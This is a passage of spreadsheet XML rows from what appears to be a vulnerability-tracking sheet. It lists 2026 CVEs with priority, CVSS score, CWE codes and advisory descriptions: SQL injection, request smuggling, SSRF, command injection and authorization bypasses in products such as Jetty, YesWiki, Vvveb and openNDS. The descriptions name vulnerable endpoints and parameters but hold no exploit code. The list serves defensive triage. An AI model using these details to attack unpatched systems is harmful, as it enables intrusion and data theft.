      <c r="H1643" s="5" t="inlineStr"/>
      <c r="I1643" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1643" s="5" t="inlineStr"/>
      <c r="K1643" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1643" s="5" t="inlineStr">
        <is>
          <t>OpenPanel through commit cd24bb8 contains an SQL injection vulnerability in the analytics filter builder that fails to validate profile.* filter column identifiers before interpolating them into ClickHouse WHERE clauses. An authenticated attacker with project-scoped read or root export credentials can inject arbitrary ClickHouse SQL to bypass project isolation and read other organizations' analytics data and profile PII via blind boolean oracle techniques.</t>
        </is>
      </c>
      <c r="M1643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88890</t>
        </is>
      </c>
    </row>
    <row r="1644">
      <c r="A1644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19203</t>
        </is>
      </c>
      <c r="C1644" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1644" s="5" t="inlineStr"/>
      <c r="F1644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1644" s="5" t="inlineStr"/>
      <c r="H1644" s="5" t="inlineStr"/>
      <c r="I1644" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1644" s="5" t="inlineStr"/>
      <c r="K1644" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L1644" s="5" t="inlineStr">
        <is>
          <t>A client may issue specially crafted HTTP/1.1 chunked requests to a Jetty server that cause Jetty and an intermediary proxy to interpret different request boundaries, potentially resulting in HTTP request smuggling.
This is caused by Jetty accepting a lone LF character as a terminator in parts of chunked request parsing. Depending on the Jetty version and configured HTTP compliance mode, this may occur in chunk extensions, chunk data termination, or trailer termination.</t>
        </is>
      </c>
      <c r="M1644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t>
        </is>
      </c>
    </row>
    <row r="1645">
      <c r="A1645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28808</t>
        </is>
      </c>
      <c r="C1645" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1645" s="5" t="inlineStr"/>
      <c r="F1645" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1645" s="5" t="inlineStr"/>
      <c r="H1645" s="5" t="inlineStr">
        <is>
          <t>erlang:erlang\/inets, erlang:erlang\/otp</t>
        </is>
      </c>
      <c r="I1645" s="5" t="inlineStr">
        <is>
          <t>2026-04-07</t>
        </is>
      </c>
      <c r="J1645" s="5" t="inlineStr"/>
      <c r="K1645" s="5" t="inlineStr">
        <is>
          <t>CWE-551, CWE-863</t>
        </is>
      </c>
      <c r="L1645" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization vulnerability in Erlang OTP (inets modules) allows unauthenticated access to CGI scripts protected by directory rules when served via script_alias.
When script_alias maps a URL prefix to a directory outside DocumentRoot, mod_auth evaluates directory-based access controls against the DocumentRoot-relative path while mod_cgi executes the script at the ScriptAlias-resolved path. This path mismatch allows unauthenticated access to CGI scripts that directory rules were meant to protect.
This vulnerability is associated with program files lib/inets/src/http_server/mod_alias.erl, lib/inets/src/http_server/mod_auth.erl, and lib/inets/src/http_server/mod_cgi.erl.
This issue affects OTP from OTP 17.0 before OTP 26.2.5.19, OTP 27.3.4.10, and OTP 28.4.2, corresponding to inets from 5.10 before 9.1.0.6, 9.3.2.4, and 9.6.2. Whether OTP before OTP 17.0, corresponding to inets before 5.10, is affected is unknown.</t>
        </is>
      </c>
      <c r="M1645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28808</t>
        </is>
      </c>
    </row>
    <row r="1646">
      <c r="A1646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29988</t>
        </is>
      </c>
      <c r="C1646" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1646" s="5" t="inlineStr"/>
      <c r="F1646" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1646" s="5" t="inlineStr"/>
      <c r="H1646" s="5" t="inlineStr"/>
      <c r="I1646" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1646" s="5" t="inlineStr"/>
      <c r="K1646" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L1646" s="5" t="inlineStr">
        <is>
          <t>A cleartext transmission of sensitive information vulnerability in the NFC interface of multiple Milesight IoT device models running affected firmware versions allows an unauthenticated attacker with physical proximity to retrieve LoRaWAN ABP NwkSKey and AppSKey values and D2D keys via an NFC read operation. The exposed keys can be used to decrypt LoRaWAN traffic, forge uplink and downlink frames, submit falsified sensor data, issue supported device commands, and cause subsequent legitimate frames to be rejected.</t>
        </is>
      </c>
      <c r="M1646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29988</t>
        </is>
      </c>
    </row>
    <row r="1647">
      <c r="A1647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38820</t>
        </is>
      </c>
      <c r="C1647" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1647" s="5" t="inlineStr"/>
      <c r="F1647" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G1647" s="5" t="inlineStr"/>
      <c r="H1647" s="5" t="inlineStr"/>
      <c r="I1647" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1647" s="5" t="inlineStr"/>
      <c r="K1647" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1647" s="5" t="inlineStr">
        <is>
          <t>openNDS before 11.0.0 is susceptible to unauthenticated OS command execution via shell command injection through the fas query parameter on the /opennds_preauth/ endpoint because of libopennds.sh.</t>
        </is>
      </c>
      <c r="M1647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38820</t>
        </is>
      </c>
    </row>
    <row r="1648">
      <c r="A1648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45730</t>
        </is>
      </c>
      <c r="C1648" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1648" s="5" t="inlineStr"/>
      <c r="F1648" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1648" s="5" t="inlineStr"/>
      <c r="H1648" s="5" t="inlineStr"/>
      <c r="I1648" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1648" s="5" t="inlineStr"/>
      <c r="K1648" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1648" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.0, there is a vulnerability in Nuclio Dashboard's project management API, allowing any authenticated user (without membership in the target project) to bypass OPA authorization checks on write paths (PUT /api/projects/{id}, DELETE /api/projects) and modify or delete any project along with all its associated resources (functions, API gateways, etc.). This issue has been patched in version 1.16.0.</t>
        </is>
      </c>
      <c r="M1648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45730</t>
        </is>
      </c>
    </row>
    <row r="1649">
      <c r="A1649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48105</t>
        </is>
      </c>
      <c r="C1649" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1649" s="5" t="inlineStr"/>
      <c r="F1649" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1649" s="5" t="inlineStr"/>
      <c r="H1649" s="5" t="inlineStr"/>
      <c r="I1649" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1649" s="5" t="inlineStr"/>
      <c r="K1649" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-345, CWE-913</t>
        </is>
      </c>
      <c r="L1649" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc Enterprise's Raft FSM (`internal/cluster/raft/fsm.go:applyRegisterFile`) accepts attacker-chosen file paths in manifest-registration proposals without validating them against the configured storage backend. The only check is that the path is non-empty. There is no parent-traversal (`..`) rejection, no allowlist of legitimate prefixes, no scheme restriction (`s3://` vs local), and no length bound. This is fixed in 2026.06.1. Some workarounds are available. Restrict cluster network access to known-trusted peers via strict firewall rules, audit the cluster manifest for unexpected paths (any path not matching the configured storage backend root is suspect), and/or disable cluster mode until the fix is available.</t>
        </is>
      </c>
      <c r="M1649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48105</t>
        </is>
      </c>
    </row>
    <row r="1650">
      <c r="A1650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48106</t>
        </is>
      </c>
      <c r="C1650" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1650" s="5" t="inlineStr"/>
      <c r="F1650" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1650" s="5" t="inlineStr"/>
      <c r="H1650" s="5" t="inlineStr"/>
      <c r="I1650" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1650" s="5" t="inlineStr"/>
      <c r="K1650" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-345, CWE-924</t>
        </is>
      </c>
      <c r="L1650" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc Enterprise's cluster replication receiver at `internal/cluster/replication/receiver.go` validates only the wire-format envelope (length, opcode) of inbound messages. The `MsgReplicateSync` payload itself is accepted without any application-layer authentication — no HMAC, no signature, no per-message nonce. The replication stream is protected at the transport layer by TLS / mTLS, but there is no protection against application-layer message tampering or replay once a peer is on the cluster network. This is fixed in 2026.06.1. Some workarounds are available. Restrict cluster network access to known-trusted peers via strict firewall rules, audit replication logs for unexpected `MsgReplicateSync` traffic, and/or disable cluster mode until the fix is available.</t>
        </is>
      </c>
      <c r="M1650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48106</t>
        </is>
      </c>
    </row>
    <row r="1651">
      <c r="A1651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49224</t>
        </is>
      </c>
      <c r="C1651" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1651" s="5" t="inlineStr"/>
      <c r="F1651" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1651" s="5" t="inlineStr"/>
      <c r="H1651" s="5" t="inlineStr"/>
      <c r="I1651" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1651" s="5" t="inlineStr"/>
      <c r="K1651" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1651" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend post revision operations allow a low-privileged Author to access revisions for posts owned by another Author. The admin/controller/content/revisions.php controller and admin/sql/sqlite/post_content_revision.sql queries trust caller-controlled post_id, language_id, and created_at values without consistently applying the current admin_id to revision lists, reads, restores, and deletes. An attacker can read historic post content, restore a revision over another Author's live post content, or delete revision records, exposing drafts, corrupting published content, and removing audit history. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M1651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49224</t>
        </is>
      </c>
    </row>
    <row r="1652">
      <c r="A1652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49225</t>
        </is>
      </c>
      <c r="C1652" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1652" s="5" t="inlineStr"/>
      <c r="F1652" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1652" s="5" t="inlineStr"/>
      <c r="H1652" s="5" t="inlineStr"/>
      <c r="I1652" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1652" s="5" t="inlineStr"/>
      <c r="K1652" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1652" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend product revision operations allow a low-privileged Vendor to access revisions for products owned by another Vendor. The admin/controller/product/revisions.php route reuses admin/controller/content/revisions.php, while admin/sql/sqlite/product_content_revision.sql trusts caller-controlled product_id, language_id, and created_at values without applying the current admin_id to revision reads, restores, and deletes. An attacker can read historic product content, restore a revision over another Vendor's live product content, or delete revision records, exposing private copy, corrupting product pages, and removing audit history. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M1652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49225</t>
        </is>
      </c>
    </row>
    <row r="1653">
      <c r="A1653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49226</t>
        </is>
      </c>
      <c r="C1653" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1653" s="5" t="inlineStr"/>
      <c r="F1653" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1653" s="5" t="inlineStr"/>
      <c r="H1653" s="5" t="inlineStr"/>
      <c r="I1653" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1653" s="5" t="inlineStr"/>
      <c r="K1653" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1653" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend post operations allow a low-privileged Author to access posts owned by another Author. The admin/controller/content/posts.php controller permits filter[admin_id] to replace the server-selected admin_id restriction and accepts a caller-controlled post_id for duplicate and delete actions, while admin/sql/sqlite/post.sql does not consistently enforce post.admin_id. An attacker can view post metadata, discover post identifiers, duplicate posts, or delete posts and related content, exposing private drafts and causing content pollution, data loss, or business disruption. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M1653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49226</t>
        </is>
      </c>
    </row>
    <row r="1654">
      <c r="A1654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52769</t>
        </is>
      </c>
      <c r="C1654" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1654" s="5" t="inlineStr"/>
      <c r="F1654" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1654" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1654" s="5" t="inlineStr"/>
      <c r="I1654" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1654" s="5" t="inlineStr"/>
      <c r="K1654" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1654" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.6.2 to before version 4.6.6, the POST /api/forms/{formId}/actor/inbox route - exposed publicly with acl:"public" - accepts an HTTP Signature header whose keyId parameter is a URL. HttpSignatureService::verifySignature() parses the header and immediately makes a server-side HTTP GET to that URL, before any cryptographic verification or URL validation. An unauthenticated remote attacker can therefore make YesWiki issue arbitrary outbound HTTP requests to any host the server can reach - internal services, cloud-metadata endpoints (169.254.169.254), intranet-only admin panels, etc. - and read enough back via timing and error-message oracles to scan ports, enumerate services, and (on a real cloud instance) reach IAM metadata. The only deployment-side precondition is that ActivityPub be enabled on at least one Bazar form. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M1654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52769</t>
        </is>
      </c>
    </row>
    <row r="1655">
      <c r="A1655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52771</t>
        </is>
      </c>
      <c r="C1655" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1655" s="5" t="inlineStr"/>
      <c r="F1655" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1655" s="5" t="inlineStr"/>
      <c r="H1655" s="5" t="inlineStr"/>
      <c r="I1655" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1655" s="5" t="inlineStr"/>
      <c r="K1655" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1655" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.2.0 to before version 4.6.6, ApiController::deletePage() interpolates a page tag retrieved from the database into a DELETE FROM …_links WHERE to_tag = '$tag' query without escaping. The page tag is attacker-controlled — the POST /api/pages/{tag} API accepts arbitrary URL-encoded values, including single quotes, and stores them. A low-privilege authenticated user can therefore create a page whose tag is a SQL fragment, make the page non-orphaned via the standard {{include page="…"}} link mechanism, and then invoke the delete endpoint to execute arbitrary SQL inside the wiki database - including time-based blind data exfiltration from any table. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M1655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52771</t>
        </is>
      </c>
    </row>
    <row r="1656">
      <c r="A1656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52877</t>
        </is>
      </c>
      <c r="C1656" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1656" s="5" t="inlineStr"/>
      <c r="F1656" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1656" s="5" t="inlineStr"/>
      <c r="H1656" s="5" t="inlineStr"/>
      <c r="I1656" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1656" s="5" t="inlineStr"/>
      <c r="K1656" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-749</t>
        </is>
      </c>
      <c r="L1656" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Prior to version 2.6.0, the open-external IPC handler in src/ipc/downloads.js passes a renderer-supplied url directly to Electron's shell.openExternal without validating its protocol. A compromised renderer can submit file: URIs or operating-system-specific custom schemes, causing the host to open local files, access remote resources through registered handlers, or launch scripts and applications supported by those handlers. This issue is fixed in version 2.6.0.</t>
        </is>
      </c>
      <c r="M1656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52877</t>
        </is>
      </c>
    </row>
    <row r="1657">
      <c r="A1657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53507</t>
        </is>
      </c>
      <c r="C1657" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1657" s="5" t="inlineStr"/>
      <c r="F1657" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1657" s="5" t="inlineStr"/>
      <c r="H1657" s="5" t="inlineStr"/>
      <c r="I1657" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1657" s="5" t="inlineStr"/>
      <c r="K1657" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="L1657" s="5" t="inlineStr">
        <is>
          <t>oasdiff-action is a GitHub Action that detects breaking changes in OpenAPI specs and post a review on every pull request. Before version 0.0.51, the oasdiff actions resolved external $refs in the OpenAPI spec by default (allow-external-refs: true). When an action runs on a pull request whose spec is attacker-controlled — most importantly fork pull requests on public repositories — a $ref in that spec is fetched/read on the runner with no interaction required, enabling SSRF and disclosure of structured files on the runner. This issue has been patched in version 0.0.51.</t>
        </is>
      </c>
      <c r="M1657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53507</t>
        </is>
      </c>
    </row>
    <row r="1658">
      <c r="A1658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54100</t>
        </is>
      </c>
      <c r="C1658" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1658" s="5" t="inlineStr"/>
      <c r="F1658" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1658" s="5" t="inlineStr">
        <is>
          <t>windows, red hat</t>
        </is>
      </c>
      <c r="H1658" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:windows_machine_config_operator</t>
        </is>
      </c>
      <c r="I1658" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J1658" s="5" t="inlineStr"/>
      <c r="K1658" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1658" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Windows Machine Config Operator (WMCO) for Red Hat OpenShift Container Platform. WMCO establishes SSH connections to Windows worker nodes without verifying the remote server host key. An adjacent-network attacker who can intercept or redirect WMCO's SSH session can capture WICD and kubelet bootstrap credentials transferred during node configuration, enabling compromise of Windows node identities in the cluster.</t>
        </is>
      </c>
      <c r="M1658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54100</t>
        </is>
      </c>
    </row>
    <row r="1659">
      <c r="A1659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57164</t>
        </is>
      </c>
      <c r="C1659" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1659" s="5" t="inlineStr"/>
      <c r="F1659" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1659" s="5" t="inlineStr"/>
      <c r="H1659" s="5" t="inlineStr"/>
      <c r="I1659" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1659" s="5" t="inlineStr"/>
      <c r="K1659" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1659" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 8d5956a, a heap buffer overflow exists in the PJLIB-UTIL HTTP client (http_client.c) when buffering an HTTP response body. This affects applications that use the PJLIB-UTIL HTTP client to receive a whole response body at once (a completion callback with no incremental on_data_read callback). When growing the response buffer, an incorrect size calculation based on the server-supplied Content-Length can leave the buffer too small, causing response data to be written past the end of the allocation. A malicious or man-in-the-middle HTTP server can trigger this with a crafted response; impact may range from unexpected application termination to memory corruption. Applications that consume the response incrementally (via on_data_read), or that only connect to trusted servers, are not affected. This issue has been patched via commit 8d5956a.</t>
        </is>
      </c>
      <c r="M1659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57164</t>
        </is>
      </c>
    </row>
    <row r="1660">
      <c r="A1660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69646</t>
        </is>
      </c>
      <c r="C1660" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1660" s="5" t="inlineStr"/>
      <c r="F1660" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1660" s="5" t="inlineStr"/>
      <c r="H1660" s="5" t="inlineStr"/>
      <c r="I1660" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1660" s="5" t="inlineStr"/>
      <c r="K1660" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1660" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="M1660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t>
        </is>
      </c>
    </row>
    <row r="1661">
      <c r="A1661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70473</t>
        </is>
      </c>
      <c r="C1661" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1661" s="5" t="inlineStr"/>
      <c r="F1661" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1661" s="5" t="inlineStr"/>
      <c r="H1661" s="5" t="inlineStr"/>
      <c r="I1661" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1661" s="5" t="inlineStr"/>
      <c r="K1661" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-202, CWE-862</t>
        </is>
      </c>
      <c r="L1661" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to 3.1.3, Flowise GET /api/v1/upsert-history returns the entire server-wide upsert history instead of being scoped to the requesting user, tenant, or workspace. The response can exceed 100MB and includes sensitive configuration data, including Vector Store settings such as Qdrant Server URL and collection name. The observed behavior indicates missing or insufficient authorization checks, workspace/project/tenant isolation, and pagination or limits, exposing integration parameters and infrastructure details that may enable further targeted attacks. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M1661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70473</t>
        </is>
      </c>
    </row>
    <row r="1662">
      <c r="A1662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70476</t>
        </is>
      </c>
      <c r="C1662" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1662" s="5" t="inlineStr"/>
      <c r="F1662" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1662" s="5" t="inlineStr"/>
      <c r="H1662" s="5" t="inlineStr"/>
      <c r="I1662" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
